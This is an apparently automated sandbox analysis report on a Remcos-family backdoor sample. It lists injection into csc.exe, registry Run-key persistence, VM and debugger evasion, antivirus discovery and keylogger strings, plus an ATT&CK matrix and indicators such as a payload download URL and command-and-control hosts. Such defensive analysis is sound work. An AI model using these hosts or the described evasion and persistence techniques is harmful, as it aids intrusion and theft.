                      Source: Binary string: protobuf-net.pdbSHA256}Lq source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: protobuf-net.pdb source: csc.exe, 00000003.00000002.4047594349.0000000009530000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.00000000082D5000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp
                      Source: Binary string: Srlfeb.pdbx source: csc.exe, 00000003.00000003.2408664387.000000000819E000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4047366440.0000000009410000.00000004.08000000.00040000.00000000.sdmp, csc.exe, 00000003.00000003.2408664387.0000000007FBC000.00000004.00000800.00020000.00000000.sdmp

                      Data Obfuscation

                      Source: 0.2.4JwhvqLe8n.exe.22c0000.1.raw.unpack, ResponderElement.cs.Net Code: typeof(Marshal).GetMethod("GetDelegateForFunctionPointer", new Type[2]{typeof(IntPtr),typeof(Type)})
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, H9dYhdNnGJ0iMLyBevQ.cs.Net Code: Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777307)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777250)),Type.GetTypeFromHandle(G7xv6UQryw9sD1SGpf2.VRcsQKwJNu(16777305))})
                      Source: 0.2.4JwhvqLe8n.exe.22c0000.1.raw.unpack, MapAnalyzer.cs.Net Code: IncludeMap System.Reflection.Assembly.Load(byte[])
                      Source: 3.3.csc.exe.8285b68.3.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 3.3.csc.exe.8285b68.3.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 3.3.csc.exe.8285b68.3.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 3.3.csc.exe.8285b68.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 3.3.csc.exe.8285b68.3.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 3.3.csc.exe.82d5b88.0.raw.unpack, TypeModel.cs.Net Code: TryDeserializeList
                      Source: 3.3.csc.exe.82d5b88.0.raw.unpack, ListDecorator.cs.Net Code: Read
                      Source: 3.3.csc.exe.82d5b88.0.raw.unpack, TypeSerializer.cs.Net Code: CreateInstance
                      Source: 3.3.csc.exe.82d5b88.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateInstance
                      Source: 3.3.csc.exe.82d5b88.0.raw.unpack, TypeSerializer.cs.Net Code: EmitCreateIfNull
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, ReflectionHelper.cs.Net Code: InvokeMethod
                      Source: 3.2.csc.exe.9c40000.8.raw.unpack, XmlSerializationHelper.cs.Net Code: ReadObjectProperties
                      Source: Yara matchFile source: 3.2.csc.exe.7f46ca8.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.csc.exe.94d0000.6.raw.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 3.2.csc.exe.9410000.5.unpack, type: UNPACKEDPE
                      Source: Yara matchFile source: 00000003.00000002.4046933344.0000000007EC2000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4047509534.00000000094D0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara matchFile source: Process Memory Space: csc.exe PID: 1372, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"Jump to behavior
                      Source: 4JwhvqLe8n.exeStatic PE information: real checksum: 0xca68c should be: 0x296cc4
                      Source: ccrdlld.exe.3.drStatic PE information: real checksum: 0x0 should be: 0x3e2108
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_00408243 push ebx; retf 0_2_00408244
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeCode function: 0_2_004173A5 push ecx; ret 0_2_004173B8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0936EB56 push ds; ret 3_2_0936EB57
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_09371801 pushfd ; retf 3_2_0937180D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0937BACF push cs; retf 3_2_0937BAD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0937068B push 8B000001h; iretd 3_2_09370690
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_093F0158 pushad ; iretd 3_2_093F0159
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 3_2_0979FE88 push es; ret 3_2_0979FF40
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, nVJXBHQlPK5MbsS3eA3.csHigh entropy of concatenated method names: 'BBcQRftNqD', 'd2TQqB3jnD', 'jnkQxcPWSg', 'C8qQ68cUX4', 'HmGQBW2KGL', 'laMQMe27VV', 'ho4Q5k8pLU', 'q2SQG9KEgk', 'TYpQhxCh2I', 'y4YQP4BKHw'
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, H9dYhdNnGJ0iMLyBevQ.csHigh entropy of concatenated method names: 'OfbSv8rvP8IwIGTU9i5', 'OnVoiRrcqCKf9Oa5MKD', 'wCYQpIFDtr', 'vh0ry9Sq2v', 'knSQNj5fu2', 'hDnQXpIt5a', 's6NQQGkJ2u', 'uL3QCnlUTe', 'zAksN7Kboq', 'nEuN7jDDgS'
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, h5gmjUDfwmEIIaJIRm.csHigh entropy of concatenated method names: 'qJXkK5FGP', 'y5n3tVyRy', 'mpsWotT5h', 'Q151kS8re', 'C5oHI4ky5', 'FE4TwCkUE', 'RsKB315Ts', 'Y3UjapZQ9', 'cTvE9yeC7', 'JuXRGSDIb'
                      Source: 3.3.csc.exe.819ed28.5.raw.unpack, mD3UqCQfvhthrqY1XLA.csHigh entropy of concatenated method names: 'kZVmBcn3nH', 'c6mmMubrE1', 'rLcm5NIp7U', 'Cs1mG384O5', 'd5amh5XGlj', 'XjOmPwBtBp', 'y0amf6i8QU', 'L2LCL2ZT7K', 'qXwmUSxH1y', 'dCEm4raWXl'
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeFile created: C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exeJump to dropped file
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeFile created: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\ccrdlld.exeJump to dropped file

                      Boot Survival

                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run OrionLegacyCLIJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run HardDiskSentineaJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: csc.exe PID: 1372, type: MEMORYSTR
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_DiskDrive
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 5050000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6D20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeMemory allocated: 6930000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 444000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 545532
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe Dropped PE file which has not been started: C:\Users\user\Favorites\HardDiskSentine\redist\HardDiskSentinelBin.exe
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe Dropped PE file which has not been started: C:\Users\user\Videos\OrionLegacy\Bin\OrionLegacyCLI.exe
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess (graph_0-14808)
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe API coverage: 0.8 %
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 3180 Thread sleep time: -1844674407370954s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 3180 Thread sleep time: -60000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4284 Thread sleep count: 197 > 30
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 4436 Thread sleep time: -444000s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe TID: 3180 Thread sleep time: -545532s >= -30000s
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe TID: 6752 Thread sleep count: 167 > 30
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe TID: 6752 Thread sleep time: -83500s >= -30000s
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 60000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 444000
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Thread delayed: delay time: 545532
                      Source: csc.exe, 00000003.00000003.2577032423.0000000007FBC000.00000004.00000800.00020000.00000000.sdmp, ccrdlld.exe, 00000005.00000000.2580957765.0000000000401000.00000020.00000001.01000000.00000008.sdmp, ccrdlld.exe, 00000005.00000002.2860397581.00000000134A0000.00000004.00001000.00020000.00000000.sdmp, ccrdlld.exe.3.dr Binary or memory string: /COMPAQEMU
                      Source: ccrdlld.exe, 00000006.00000003.2854551296.0000000009ABB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%
                      Source: ccrdlld.exe, 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000003.2854551296.0000000009ABB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW
                      Source: csc.exe, 00000003.00000002.4047975688.00000000097C6000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe API call chain: ExitProcess graph end node (graph_0-14810)

                      Anti Debugging

                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe System information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe System information queried: KernelDebuggerInformation
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe Code function: 0_2_0041343A ___report_gsfailure,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041343A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe Code function: 0_2_0041343A ___report_gsfailure,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0041343A
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe Code function: 0_2_00415AE9 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00415AE9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4D0000 protect: page execute and read and write
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtQuerySystemInformation: Direct from: 0x7FF8C88ED6C4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtCreateKey: Direct from: 0x7FF8C88ED3A4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtOpenSection: Direct from: 0x7FF8C88ED6E4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtProtectVirtualMemory: Direct from: 0x7FF8C88EDA04
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtSetInformationThread: Direct from: 0x7FF8C88ED1A4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtSetInformationFile: Direct from: 0x7FF8C88ED4E4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtQueryValueKey: Direct from: 0x7FF8C88ED2E4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtResumeThread: Direct from: 0x7FF8C88EDA44
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtQueueApcThread: Direct from: 0x7FF8C88ED8A4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtQueryAttributesFile: Direct from: 0x7FF8C88ED7A4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtCreateFile: Direct from: 0x7FF8C88EDAA4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtOpenKeyEx: Direct from: 0x7FF8C88EF3F4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtNotifyChangeKey: Direct from: 0x7FF8C88EF314
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtQuerySystemInformation: Direct from: 0x7FF8C88C4B5E
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtQuerySystemInformation: Direct from: 0x76EE63E1
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtSetTimerEx: Direct from: 0x76EE7B2E
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtSetValueKey: Direct from: 0x7FF8C88EDBF4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtEnumerateValueKey: Direct from: 0x7FF8C88ED264
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtSetInformationProcess: Direct from: 0x7FF8C88ED384
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtCreateThreadEx: Direct from: 0x7FF8C88EE814
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtAllocateVirtualMemory: Direct from: 0x7FF8C88ED304
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtEnumerateKey: Direct from: 0x7FF8C88ED644
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtQueryInformationToken: Direct from: 0x7FF8C88ED424
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtUnmapViewOfSection: Direct from: 0x7FF8C88ED544
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtQueryInformationProcess: Direct from: 0x7FF8C88ED324
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtOpenFile: Direct from: 0x7FF8C88ED664
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtSetSecurityObject: Direct from: 0x7FF8C88F04D4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtSetTimerEx: Direct from: 0x7FF8C88F05D4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtOpenKey: Direct from: 0x7FF8C88ED244
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtClose: Direct from: 0x7FF8C88ED1E4
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtSetInformationThread: Direct from: 0x76EE63F9
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtCreateMutant: Direct from: 0x7FF8C88EE654
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtQueryVolumeInformationFile: Direct from: 0x7FF8C88ED924
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe NtMapViewOfSection: Direct from: 0x7FF8C88ED504
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4D0000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\ccrdlld.exe Memory written: C:\Users\user\AppData\Local\Temp\ccrdlld.exe base: D0000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 4D0000
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe base: 69D008
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045827391.0000000009AB6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: [2024/12/12 12:02:45 Program Manager]
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Manager
                      Source: ccrdlld.exe, 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045827391.0000000009AB6000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: [2024/12/12 12:02:51 Program Manager]
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Managerr|
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: [%04i/%02i/%02i %02i:%02i:%02i Program Manager]
                      Source: ccrdlld.exe, 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Program Managerd996ca
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program ManagerMJ
                      Source: ccrdlld.exe, 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: |Program Manager|
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009AAB000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program Managern
                      Source: ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Program ManagernJ
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe Code function: GetLocaleInfoW,_swscanf,0_2_0040EC80
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe VolumeInformation
                      Source: C:\Users\user\Desktop\4JwhvqLe8n.exe Code function: 0_2_0041C45E GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,QueryPerformanceCounter,0_2_0041C45E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: csc.exe, 00000003.00000003.2383707260.00000000097C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: gramFiles%\Windows Defender\MsMpeng.exe
                      Source: csc.exe, 00000003.00000003.2383707260.00000000097C1000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

                      Stealing of Sensitive Information

                      Source: Yara match File source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: ccrdlld.exe PID: 7120, type: MEMORYSTR

                      Remote Access Functionality

                      Source: Yara match File source: 5.2.ccrdlld.exe.11bb0000.0.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ccrdlld.exe.13420000.1.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ccrdlld.exe.11bb0000.0.raw.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 5.2.ccrdlld.exe.13420000.1.unpack, type: UNPACKEDPE
                      Source: Yara match File source: 00000006.00000002.4045506255.0000000009A48000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.2860139753.0000000013420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: 00000005.00000002.2859984415.0000000011BB0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match File source: Process Memory Space: ccrdlld.exe PID: 4288, type: MEMORYSTR
                      Source: Yara match File source: Process Memory Space: ccrdlld.exe PID: 7120, type: MEMORYSTR
                      Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
                      Gather Victim Identity Information | Acquire Infrastructure | Valid Accounts | 131 Windows Management Instrumentation | 11 Scheduled Task/Job | 32 Process Injection | 1 Masquerading | 11 Input Capture | 1 System Time Discovery | Remote Services | 11 Input Capture | 11 Encrypted Channel | Exfiltration Over Other Network Medium | Abuse Accessibility Features
                      Credentials | Domains | Default Accounts | 11 Scheduled Task/Job | 11 Registry Run Keys / Startup Folder | 11 Scheduled Task/Job | 11 Disable or Modify Tools | LSASS Memory | 251 Security Software Discovery | Remote Desktop Protocol | 12 Archive Collected Data | 1 Non-Standard Port | Exfiltration Over Bluetooth | Network Denial of Service
                      Email Addresses | DNS Server | Domain Accounts | 1 Native API | 1 DLL Side-Loading | 1 Abuse Elevation Control Mechanism | 251 Virtualization/Sandbox Evasion | Security Account Manager | 1 Process Discovery | SMB/Windows Admin Shares | Data from Network Shared Drive | 1 Ingress Tool Transfer | Automated Exfiltration | Data Encrypted for Impact
                      Employee Names | Virtual Private Server | Local Accounts | Cron | Login Hook | 11 Registry Run Keys / Startup Folder | 32 Process Injection | NTDS | 251 Virtualization/Sandbox Evasion | Distributed Component Object Model | Input Capture | 2 Non-Application Layer Protocol | Traffic Duplication | Data Destruction
                      Gather Victim Network Information | Server | Cloud Accounts | Launchd | Network Logon Script | 1 DLL Side-Loading | 11 Deobfuscate/Decode Files or Information | LSA Secrets | 134 System Information Discovery | SSH | Keylogging | 13 Application Layer Protocol | Scheduled Transfer | Data Encrypted for Impact
                      Domain Properties | Botnet | Replication Through Removable Media | Scheduled Task | RC Scripts | RC Scripts | 1 Abuse Elevation Control Mechanism | Cached Domain Credentials | Wi-Fi Discovery | VNC | GUI Input Capture | Multiband Communication | Data Transfer Size Limits | Service Stop
                      DNS | Web Services | External Remote Services | Systemd Timers | Startup Items | Startup Items | 2 Obfuscated Files or Information | DCSync | Remote System Discovery | Windows Remote Management | Web Portal Capture | Commonly Used Port | Exfiltration Over C2 Channel | Inhibit System Recovery
                      Network Trust Dependencies | Serverless | Drive-by Compromise | Container Orchestration Job | Scheduled Task/Job | Scheduled Task/Job | 2 Software Packing | Proc Filesystem | System Owner/User Discovery | Cloud Services | Credential API Hooking | Application Layer Protocol | Exfiltration Over Alternative Protocol | Defacement
                      Network Topology | Malvertising | Exploit Public-Facing Application | Command and Scripting Interpreter | At | At | 1 DLL Side-Loading | /etc/passwd and /etc/shadow | Network Sniffing | Direct Cloud VM Connections | Data Staged | Web Protocols | Exfiltration Over Symmetric Encrypted Non-C2 Protocol | Internal Defacement
                      [Behavior graph: Behavior Graph ID: 1573906, Sample: 4JwhvqLe8n.exe, Startdate: 12/12/2024, Architecture: WINDOWS, Score: 100]

                      Source | Detection | Scanner | Label | Link
                      4JwhvqLe8n.exe | 42% | ReversingLabs | Win32.Backdoor.Remcos |
                      No Antivirus matches
                      No Antivirus matches
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
                      https://bbuseruploads.s3.amazonaws | 0% | Avira URL Cloud | safe |
                      http://www.hdsentinel.comU | 0% | Avira URL Cloud | safe |
                      newstaticfreepoint24.ddns-ip.net | 0% | Avira URL Cloud | safe |
                      http://www.hdsentinel.com/sendreport.phpU | 0% | Avira URL Cloud | safe |
                      http://www.hdsentinel.com | 0% | Avira URL Cloud | safe |
                      Name | IP | Active | Malicious | Antivirus Detection | Reputation
                      s3-w.us-east-1.amazonaws.com | 3.5.24.44 | true | false | | high
                      bitbucket.org | 185.166.143.49 | true | false | | high
                      navegacionseguracol24vip.org | 181.131.217.244 | true | false | | high
                      geoplugin.net | 178.237.33.50 | true | false | | high
                      newstaticfreepoint24.ddns-ip.net | 181.131.217.244 | true | false | | high
                      bbuseruploads.s3.amazonaws.com | unknown | unknown | false | | high
                      Name | Malicious | Antivirus Detection | Reputation
                      http://geoplugin.net/json.gp | false | | high
                      https://bitbucket.org/facturacioncol/fact/downloads/null.exe | false | | high
                      newstaticfreepoint24.ddns-ip.net | true | Avira URL Cloud: safe | unknown
                                                                                        https://aui-cdn.atlassian.com/csc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          http://geoplugin.net/json.gpn.net/son.gp5BCA4A7416Bccrdlld.exe, 00000006.00000003.2854551296.0000000009A7F000.00000004.00000001.00020000.00000000.sdmp, ccrdlld.exe, 00000006.00000002.4045600619.0000000009A8E000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://remote-app-switcher.stg-east.frontend.public.atl-paas.netcsc.exe, 00000003.00000002.4046058134.0000000006DD5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://bbuseruploads.s3.amazonaws.com/986cb0ac-5fcf-4393-afaa-e2b223260ae9/downloads/47e1d263-9601-csc.exe, 00000003.00000002.4046058134.0000000006DD9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                http://s3-w.us-east-1.amazonaws.comcsc.exe, 00000003.00000002.4046058134.0000000006E62000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namecsc.exe, 00000003.00000002.4046058134.0000000006D21000.00000004.00000800.00020000.00000000.sdmp, csc.exe, 00000003.00000002.4046058134.0000000006FB0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    high
